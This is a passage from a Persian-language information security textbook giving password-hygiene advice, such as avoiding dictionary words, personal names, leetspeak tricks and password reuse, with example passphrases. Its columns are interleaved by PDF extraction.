‫ﻛﻨﻴﺪ )ﻳﻌﻨﻲ ﺭﻣﺰ ﻣﺘﺸﻜﻞ ﺍﺯ ﻟﻐﺎﺗﻲ ﺑﺎﺷﺪ ﻛﻪ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﭼـﺴﺒﻴﺪﻩ‪-‬‬
‫ﺍﻧﺪ(‪.‬‬
‫ﻣﺸﻜﻞ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﻪ ﻋﻠﺖ ﻓﻘـﺪﺍﻥ ﺍﻣﻨﻴـﺖ ﻻﺯﻡ ﺩﺭ ﺑﻌـﻀﻲ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻴﺰﺑـﺎﻥ‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﻪ ﺧﺎﻃﺮ ﺑـﺴﭙﺎﺭﻳﺪ‬ ‫•‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻪ ﺭﻣﺰ ﻋﺒـﻮﺭ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻫﻤﻴﻦ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺭ ﭼﻨﺪﻳﻦ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺗﻤﺎﻣﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺳﺖ ﻳﺎﺑﻨﺪ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ‬
‫ﻛﻨﻴﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻭ ﻓﺮﺩﻱ ﺭﻣﺰ ﻋﺒـﻮﺭ‬
‫ﻱ‬
‫ﺑﻴﺎﺑﻨﺪ‪ .‬ﺣﺘـﻲ ﺍﮔـﺮ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭ ﹺ‬
‫ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﻛـﺸﻒ ﻛﻨـﺪ‪ ،‬ﺍﻣﻨﻴـﺖ‬
‫ﻳﻜﺴﻮﻳﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ﺑﺎﺯ ﻫﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧـﺪ‬
‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺩﻳﮕــﺮ ﻛــﻪ ﺩﺭ ﺁﻧﻬــﺎ ﺍﺯ ﺭﻣــﺰ ﻋﺒــﻮﺭ ﻣــﺸﺎﺑﻪ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﻛﺸﻒ ﻛﻨﺪ؛ ﭼـﻮﻥ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻳﺪ ﻧﻴﺰ ﺑﻪ ﺧﻄـﺮ ﺧﻮﺍﻫـﺪ ﺍﻓﺘـﺎﺩ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ‬
‫ﺍﻳﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﻟﺬﺍ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ‬
‫ﭼﻨﻴﻦ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﺭﺍ ﺑﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﺍﻧﺘﺨـﺎﺏ ﻛﻨﻴـﺪ‬
‫ﺁﻥ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻤـﺔ ﻛﻠﻤـﺎﺕ ﺩﺭﻭﻥ ﻓﺮﻫﻨـﮓ‬
‫ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺣﻔﺎﻇﺖ ﺧﺎﺻﻲ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﺑـﺮﺍﻱ‬
‫ﻼ ﺍﮔـﺮ‬‫ﻟﻐﺎﺕ ﻭ ﺳﺎﻳﺮ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺘﺪﺍﻭﻝ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﻟﺬﺍ ﻣـﺜ ﹰ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟﺐ ﺭﻭﺯﻧﺎﻣﻪﻫﺎ ﻭ ﺩﻳﮕﺮ ﻣﻄﺎﻟﺐ‪ ،‬ﻧﻴﺎﺯﻱ ﺑـﻪ‬
‫ﺷﻤﺎ ﺍﺯ ﻛﻠﻤﺔ ‪ birthday‬ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﺎﺷـﻴﺪ‬
‫ﭘﺮﺩﺍﺧﺖ ﭘﻮﻝ ﻳﺎ ﺍﺭﺍﺋﻪ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﻧﻴـﺴﺖ‪ ،‬ﺍﻣـﺎ‬
‫ﻣﻬﺎﺟﻢ ﻫﻨﮕﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻤـﺔ ‪ birthday‬ﻣﺘﻮﺟـﻪ ﻣـﻲﺷـﻮﺩ‬
‫ﺑﺮﺍﻱ ﺧﻮﺍﻧﺪﻥ ﻣﻘﺎﻻﺕ ﺑﻌﻀﻲ ﺍﺯ ﺭﻭﺯﻧﺎﻣﻪﻫﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ‬
‫ﻧﺴﺨﺔ ﺭﻣﺰﮔﺬﺍﺭﻱﺷـﺪﻩ ﺁﻥ ﺑـﺎ ﺁﻧﭽـﻪ ﻛـﻪ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺍﺳـﺖ‬
‫ﻣﺮﺑﻮﻃﻪ ﺑﺎﻳﺪ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﻭﺍﺭﺩ ﻛﻨﻴـﺪ‪.‬‬
‫ﻣﻄﺎﺑﻘﺖ ﺩﺍﺭﺩ ﻭ ﻟﺬﺍ ﺍﺯ ﺁﻥ ﭘﺲ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﺧﻮﺍﻫﺪ ﺩﺍﻧﺴﺖ‪.‬‬
‫ﺩﺭﻭﺍﻗﻊ ﺁﻧﻬﺎ ﻓﻘﻂ ﻣﻲ ﺧﻮﺍﻫﻨﺪ ﺷﻤﺎ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺁﻧﻬـﺎ ﻭﺍﺭﺩ‬
‫ﺷـﻮﻳﺪ؛ ﺑﻨـﺎﺑﺮ ﺍﻳــﻦ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑــﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ ﻣﻄﺎﻟــﺐ‬ ‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻛﻞ ﺍﻳﺪﺓ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺮﺍﻱ ﺻﺪﻭﺭ ﺍﺟﺎﺯﺓ‬
‫ﺭﻭﺯﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﻳﻚ ﺭﻣﺰ ﻋﺒـﻮﺭ ﻣـﺸﺎﺑﻪ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﻭﺭﻭﺩ ﺷﻤﺎ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﺭ ﺯﻣﺎﻥ ﺩﻟﺨﻮﺍﻩ ﻭ ﺩﺷـﻮﺍﺭ ﻛـﺮﺩﻥ ﺣـﺪﺱ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫ﺁﻥ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺍﺳـﺖ‪ ،‬ﻣـﻲﺗـﻮﺍﻥ ﭼﻨـﺪ ﻣﺸﺨـﺼﻪ ﺑـﺮﺍﻱ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺴﺘﺤﻜﻢ ﺑﺮ ﺷـﻤﺮﺩ‪ .‬ﻣـﺸﺎﺑﻪ ﻧﺎﻣﻬـﺎﻱ ﻛـﺎﺭﺑﺮﻱ‪،‬‬
‫ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺣﺮﻭﻑ ﺭﺍ ﺑﺎ ﻋﻼﺋﻢ ﻳﺎ ﺍﺭﻗﺎﻡ ﻣـﺸﺎﺑﻪ ﻋـﻮﺽ‬ ‫•‬
‫ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻗـﻮﺍﻧﻴﻦ ﻣﺘﻔـﺎﻭﺗﻲ ﺭﺍ ﺑـﺮﺍﻱ ﺭﻣـﺰ‬
‫ﻼ ﺍﺯ ﺭﻗﻢ "‪ "1‬ﺑﺠـﺎﻱ ﺣـﺮﻭﻑ "‪ "I‬ﻳـﺎ "‪ ،"L‬ﺍﺯ‬‫ﻣﻲﻛﻨﻨﺪ؛ ﻣﺜ ﹰ‬
‫ﻋﺒﻮﺭ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪﺍﻧﺪ )ﺣﺪﺍﻗﻞ ﻭ ﺣـﺪﺍﻛﺜﺮ ﻃـﻮﻝ‪ ،‬ﺣـﺮﻭﻑ ﻣﺠـﺎﺯ ﺑـﺮﺍﻱ‬
‫ﺷﻤﺎﺭﺓ "‪ "3‬ﻳﺎ ﻋﻼﻣﺖ "‪ "#‬ﺑﺠﺎﻱ ﺣﺮﻑ "‪ ،"E‬ﺍﺯ ﺭﻗﻢ "‪"0‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ‪ ،‬ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ(‪.‬‬
‫ﺑﺠﺎﻱ ﺣﺮﻑ "‪ ،"O‬ﺍﺯ ﻋﻼﻣﺖ "@" ﺑﺠﺎﻱ ﺣـﺮﻑ "‪ ،"A‬ﻭ‬
‫ﺍﺯ ﺭﻗﻢ "‪ "5‬ﺑﺠﺎﻱ ﺣﺮﻑ "‪ "S‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻨـﺪ‪ .‬ﺍﻳﻨﻜـﺎﺭ‬ ‫ﻫﺮﮔﺰ ﺍﺯ ﻳﻚ ﻛﻠﻤﺔ ﻣﻨﻔﺮﺩ ﺩﺭ ﺯﺑﺎﻥ ﻣﺎﺩﺭﻱ ﺧـﻮﺩ ﺑﻌﻨـﻮﺍﻥ‬ ‫•‬
‫ﺗﺮﻓﻨﺪ ﺧﻮﺑﻲ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺑﻪ ﻳـﺎﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﻳـﻚ‬ ‫ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴـﺪ‪ .‬ﺍﻧﺘﺨـﺎﺏ ﻳـﻚ ﻋﺒـﺎﺭﺕ‪ ،‬ﻳـﻚ‬
‫ﻼ ﺁﺷﻨﺎﺳـﺖ‪ .‬ﺍﻳـﻦ‬ ‫ﻣﻬﺎﺟﻢ ﺣﺮﻓﻪﺍﻱ ﺑﺎ ﺍﻳﻦ ﺣﻘـﻪﻫـﺎ ﻛـﺎﻣ ﹰ‬ ‫ﺟﻤﻠــﻪ‪ ،‬ﻭ ﻳــﺎ ﻗﻄﻌــﺎﺗﻲ ﺍﺯ ﻛﻠﻤــﺎﺕ ﺑــﺮﺍﻱ ﺍﻳــﻦ ﻣﻨﻈــﻮﺭ‬
‫ﺣﻘﻪﻫﺎ ﻛﺎﺭ ﻭﻱ ﺭﺍ ﻛﻤﻲ ﺳﺨﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﻏﻴﺮ ﻣﻤﻜـﻦ‬ ‫ﻣﻨﺎﺳﺐﺗﺮ ﺍﺳﺖ‪.‬‬
‫ﻧﻤﻲﺳﺎﺯﺩ‪.‬‬ ‫ﭼﻨﺎﻧﭽﻪ ﺳﻴﺴﺘﻢ ﻫﻢ ﺣﺮﻭﻑ ﺑﺰﺭﮒ ﻭ ﻫﻢ ﺣﺮﻭﻑ ﻛﻮﭼﻚ‬ ‫•‬
‫ﺣﺮﻑ "‪ "I‬ﺭﺍ ﺑﻪ ﺟﺎﻱ "‪) "eye‬ﭼﺸﻢ( ﻳﺎ "‪ "aye‬ﻳﺎ ﻫﺮ ﻛﻠﻤﺔ‬ ‫•‬ ‫ﺭﺍ ﺩﺭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻌﻨﻮﺍﻥ ﺣﺮﻭﻑ ﻣﺠﺎﺯ ﻗﻠﻤﺪﺍﺩ ﻣﻲﻛﻨﺪ‪،‬‬
‫ﻣﻌﻨﺎﺩﺍﺭ ﺩﺭ ﺯﺑﺎﻥ ﺧﻮﺩﺗﺎﻥ ﻋﻮﺽ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻨﻜﺎﺭ ﺑﺨـﺼﻮﺹ‬ ‫ﺍﺯ ﻫﺮ ﺩﻭﻱ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ‪ -‬ﻭﻟﻲ ﻧﻪ ﺩﺭ ﺟﺎﻱ ﺻﺤﻴﺢ‬
‫ﺑﺮﺍﻱ ﻟﻐﺎﺗﻲ ﻣﺜـﻞ "‪ "icon‬ﻛـﻪ ﭘـﺲ ﺍﺯ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺑـﻪ‬ ‫ﻲ ﺧﻮﺩ‪.‬‬‫ﻭ ﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨ ﹺ‬
‫"‪ "eyecon‬ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﺩ ﻣﻔﻴﺪ ﺍﺳﺖ‪.‬‬
‫‪٦٣‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺭﻣﺰ ﻋﺒﻮﺭ ﻫﺮﭼﻪ ﻛﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺑﺪﻭﻥ ﻧﻮﺷﺘﻦ ﺁﻧـﺮﺍ ﺑﺨـﺎﻃﺮ‬ ‫•‬ ‫ﺍﺯ ﺳﺮﻧﺎﻡﻫﺎ )ﺣﺮﻭﻑ ﺍﻭﻝ ﻟﻐﺘﻬﺎﻱ ﺳﺎﺯﻧﺪﻩ ﻳﻚ ﻋﺒﺎﺭﺕ( ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫•‬
‫ﺑﺴﭙﺎﺭﻳﺪ‪ .‬ﻫﺮﮔﺰ ﺭﻣﺰ ﻋﺒـﻮﺭ ﺭﺍ ﺟـﺎﻳﻲ ﻧﻨﻮﻳـﺴﻴﺪ ﻭ ﺁﻧـﺮﺍ ﺩﺭ‬ ‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ "‪ "tgbwc‬ﺳـﺮﻧﺎﻣﻲ ﺑـﺮﺍﻱ ﺷـﻌﺎﺭ‬
‫ﻣﺤﻞ ﻛﺎﺭ ﻳﺎ ﺭﻭﻱ ﺑﺮﭼﺴﺒﻬﺎﻱ ﻋﻨﺎﻭﻳﻦ ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ‪.‬‬ ‫ﻣﻌـﺮﻭﻑ ﻛﻮﻛـﺎﻛﻮﻻ )"‪("Things Go Better With Coke‬‬
‫ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﻫﺮﮔـﺰ ﻓﻬﺮﺳـﺖ ﺭﻣﺰﮔـﺬﺍﺭﻱﻧـﺸﺪﺓ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺭﺍ ﺩﺭ‬ ‫•‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺫﺧﻴﺮﻩ ﻧﻜﻨﻴﺪ‪.‬‬ ‫ﻫﺠﻲ ﻛﺮﺩﻥ ﻟﻐﺎﺕ ﺑﺼﻮﺭﺕ ﺑﺮﻋﻜﺲ ﺁﻧﻬﺎ ﺭﺍ ﻛﻤﻲ ﻣـﺒﻬﻢ‬ ‫•‬
‫ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺷﻨﺎﺳﺎﻳﻲﺷﺎﻥ ﺭﺍ ﺳﺨﺖ ﻧﻤﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺑﻬﺘﺮﻳﻦ ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،‬ﺭﺷﺘﻪﺍﻱ ﺗﺼﺎﺩﻓﻲ ﺍﺯ ﺣﺮﻭﻑ ﻭ ﺍﺭﻗﺎﻡ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ‬
‫ﺑﺮﺍﻱ ﺍﻛﺜﺮ ﻣﺎ ﺑﺨﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺍﻳﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑـﺴﻴﺎﺭ ﺳـﺨﺖ‬ ‫ﻫﺮﮔﺰ ﺍﺯ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ‪:‬‬ ‫•‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﻼ ﺟﺎﻟـﺐ ﻧﻴـﺴﺖ ﻛـﻪ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺩﺭ ﻳـﻚ ﺩﻓﺘـﺮ‬ ‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﺻ ﹰ‬


‫ﻳﺎﺩﺩﺍﺷﺖ ﻳﺎ ﺯﻳﺮ ﺻﻔﺤﻪﻛﻠﻴـﺪ ﻧﻮﺷـﺘﻪ ﺷـﺪﻩ ﺑﺎﺷـﺪ‪ .‬ﻣﺜﺎﻟﻬـﺎﻳﻲ ﺍﺯ‬ ‫ﻳﻚ ﻧﺎﻡ ﻳﺎ ﻣﺸﺘﻘﺎﺕ ﺁﻥ؛‬ ‫‪o‬‬

‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺣﺮﻭﻑ‪ ،‬ﺷﻤﺎﺭﻩﻫﺎ‪،‬‬ ‫ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻳﺎ ﺍﺳﻢ ﻣﺴﺘﻌﺎﺭ ﺧﻮﺩﺗﺎﻥ؛‬ ‫‪o‬‬

‫ﻧﺸﺎﻧﻪ ﻫﺎﻱ ﺧﺎﺹ ﻭ ﺟﺎﻫﺎﻱ ﺧﺎﻟﻲ ﺭﺍ ﻣﻲ ﭘﺬﻳﺮﻧﺪ ﻭ ﻣﻴﺎﻥ ﺣـﺮﻭﻑ‬ ‫ﻧﺎﻡ ﻫﻤﺴﺮ‪ ،‬ﻳﺎ ﺍﺳﺎﻣﻲ ﻓﺮﺯﻧﺪﺍﻥ ﻭ ﻭﺍﻟﺪﻳﻦ؛‬ ‫‪o‬‬

‫ﻼ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧـﺪ‪ .‬ﺍﻳـﻦ‬


‫ﻛﻮﭼﻚ ﻭ ﺑﺰﺭﮒ ﺗﻔﺎﻭﺕ ﻗﺎﺋﻞ ﻣﻲﺷﻮﻧﺪ ﺫﻳ ﹰ‬ ‫ﺍﺳﺎﻣﻲ ﺩﻭﺳﺘﺎﻥ‪ ،‬ﺭﺅﺳﺎ ﻭ ﻳﺎ ﻫﻤﻜﺎﺭﺍﻥ؛‬ ‫‪o‬‬

‫ﺭﻣﺰﻫﺎ ﺑﺴﺎﺩﮔﻲ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮﺩﻩ ﻣﻲﺷـﻮﻧﺪ‪ ،‬ﺍﻣـﺎ ﻳـﺎﻓﺘﻦ ﺁﻧﻬـﺎ ﺩﺭ‬ ‫ﺍﺳﺎﻣﻲ ﺣﻴﻮﺍﻧﺎﺕ ﺧﺎﻧﮕﻲ؛‬ ‫‪o‬‬

‫ﻓﺮﻫﻨﮕﻬﺎﻱ ﻟﻐﺎﺕ ﻭ ﻳﺎ ﺣﺪﺱ ﺯﺩﻧﺸﺎﻥ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﻣﻲﺑﺎﺷﺪ‪.‬‬ ‫ﺭﻭﺯ ﺗﻮﻟﺪ ﺧﻮﺩ ﻳﺎ ﻫﺮﻳﻚ ﺍﺯ ﺩﻭﺳﺘﺎﻥ ﻭ ﺧﻮﻳﺸﺎﻭﻧﺪﺍﻥ؛‬ ‫‪o‬‬
‫ﺷﻤﺎﺭﺓ ﺗﻠﻔﻦ‪ ،‬ﺷﻤﺎﺭﺓ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻳﺎ ﻣﺪﺍﺭﻙ ﻣﺸﺎﺑﻪ؛‬ ‫‪o‬‬
‫ﺗﻮﺿﻴﺤﺎﺕ‬ ‫ﺭﻣﺰ ﻋﺒﻮﺭ‬ ‫ﺭﻧﮓ ﻣﻮﺭﺩ ﻋﻼﻗﻪ؛‬ ‫‪o‬‬
‫ﻣﻘﺎﻡ ﻳﺎ ﻋﻨﻮﺍﻥ ﺷﻐﻠﻲ؛‬ ‫‪o‬‬
‫‪Computers‬‬
‫‪Are Useful‬‬

‫ﻋﺒــﺎﺭﺗﻲ ﻛــﻪ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻛــﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧــﻪ ﺑــﺎ ﺁﻥ‬ ‫ﻧﺎﻡ ﺳﺎﺯﻣﺎﻧﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ؛‬ ‫‪o‬‬
‫ﻣﻮﺍﻓﻖ ﻫﺴﺘﻨﺪ‪.‬‬ ‫ﻫﺮ ﭼﻴﺰ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﺎ ﺁﻥ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﻳﺪ؛‬ ‫‪o‬‬
‫ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﻛﻼﺳــﻴﻚ ﻣﺜــﻞ "‪ "Xyzzy‬ﻳــﺎ‬ ‫‪o‬‬
‫"‪) "Plover‬ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫‪Computers‬‬
‫‪aReuseFul‬‬

‫ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﻳﻚ ﺟـﺎﻱ ﺧـﺎﻟﻲ ﻣﻨﺎﺳـﺐ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ‬


‫ﺑﺎﺯﻱﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ(‪ ،‬ﻭ "‪"open sesame‬؛‬
‫ﻃﻨﺰﺁﻣﻴﺰ ﺍﺯ ﺣﺮﻭﻑ ﺑﺰﺭﮒ‪.‬‬
‫ﻟﻐﺎﺗﻲ ﻛﻪ ﺩﺭ ﻓﻴﻠﻤﻬﺎﻱ ﻣﺤﺒـﻮﺏ ﻭ ﻣﻌـﺮﻭﻑ‪ ،‬ﺍﺧﺒـﺎﺭ‪،‬‬ ‫‪o‬‬
‫ﺩﺍﺳﺘﺎﻧﻬﺎ ﻭ ﻳﺎ ﺍﺩﺑﻴﺎﺕ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ؛ ﻣﺜـﻞ‬
‫ﺭﻗﻢ "‪ "0‬ﺑﺠﺎﻱ ﺣﺮﻑ "‪ "5" ،"O‬ﺑﺠـﺎﻱ "‪"@" ،"S‬‬
‫@‪C0mputer5‬‬

‫"‪ "Lord of the Rings" ،"Harry Potter‬ﻭ‬


‫‪reus#fv1‬‬

‫ﺑﺠﺎﻱ "‪ "#" ،"a‬ﺑﺠـﺎﻱ "‪ "V" ،"E‬ﺑﺠـﺎﻱ "‪ ،"U‬ﻭ‬


‫"‪"Gone with the Wind‬؛‬
‫"‪ "1‬ﺑﺠﺎﻱ ﺣﺮﻑ "‪"L‬؛ ﺩﺭ ﺍﻳﻦ ﻣﺜـﺎﻝ ﺟـﺎﻱ ﺧـﺎﻟﻲ‬
‫ﺣﺮﻭﻑ ﺭﻭﻱ ﺻـﻔﺤﻪﻛﻠﻴـﺪ ﻛـﻪ ﺩﺭ ﻛﻨـﺎﺭ ﻫـﻢ ﻗـﺮﺍﺭ‬ ‫‪o‬‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﮔﺮﻓﺘﻪﺍﻧﺪ ﻣﺎﻧﻨﺪ "‪"SDFGHJ‬؛‬
‫‪Comp9uter8sa‬‬

‫ﻣﺜﺎﻟﻬﺎﻱ ﻗﺒﻞ ﺑﻪ ﺍﺿﺎﻓﺔ ﻳﻚ ﺭﻗﻢ ﻗﺒﻞ ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻧﻬﺎ؛‬ ‫‪o‬‬


‫‪re7usef6ul‬‬

‫ﻋﺒــﺎﺭﺕ ﺍﻭﻟﻴــﻪ ﺑــﺪﻭﻥ ﺟــﺎﻱ ﺧــﺎﻟﻲ ﻭ ﻗــﺮﺍﺭﺩﺍﺩﻥ‬ ‫ﺗﻜﺮﺍﺭ ﺣﺮﻭﻑ ﻳﺎ ﺍﺭﻗﺎﻡ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﻳﺎ ﺑﺼﻮﺭﺕ ﺗﺮﺗﻴﺒﻲ‬ ‫‪o‬‬
‫ﺷﻤﺎﺭﻩﻫﺎﻳﻲ ﺑﻴﻦ ﻫﺮ ‪ ۴‬ﺣﺮﻑ‪.‬‬ ‫ﻣﺜﻞ "‪ "aaaa9999" ،"۱۲۳۴۵۶‬ﻳﺎ "‪."ABCDE‬‬
‫ﺩﺭ ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺗﻌﺪﺍﺩ ﺣﺮﻭﻑ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺎﻳﺪ ﺍﺯ ﻣﻘـﺪﺍﺭ‬ ‫•‬
‫‪Comutrsa‬‬

‫ﻣﻌﻴﻨﻲ ﺑﻴﺸﺘﺮ ﺑﺎﺷﺪ ﻭ ﻳـﺎ ﺗﻌـﺪﺍﺩ ﻣﺸﺨـﺼﻲ ﺍﺯ ﺣـﺮﻭﻑ ﻭ‬


‫‪reusful‬‬

‫ﻋﺒﺎﺭﺕ ﺍﻭﻟﻴﻪ ﺑﺎ ﭼﻨﺪ ﺣﺮﻑ ﺟﺎ ﺍﻓﺘﺎﺩﻩ‪.‬‬ ‫ﺍﺭﻗﺎﻡ ﺑﻪ ﺍﺗﻔﺎﻕ ﻫﻢ ﺭﺍ ﺩﺭ ﺑﺮ ﮔﻴﺮﺩ‪ .‬ﺍﮔـﺮ ﺩﺭ ﺗﺎﻳـﭗ ﻛـﺮﺩﻥ‬
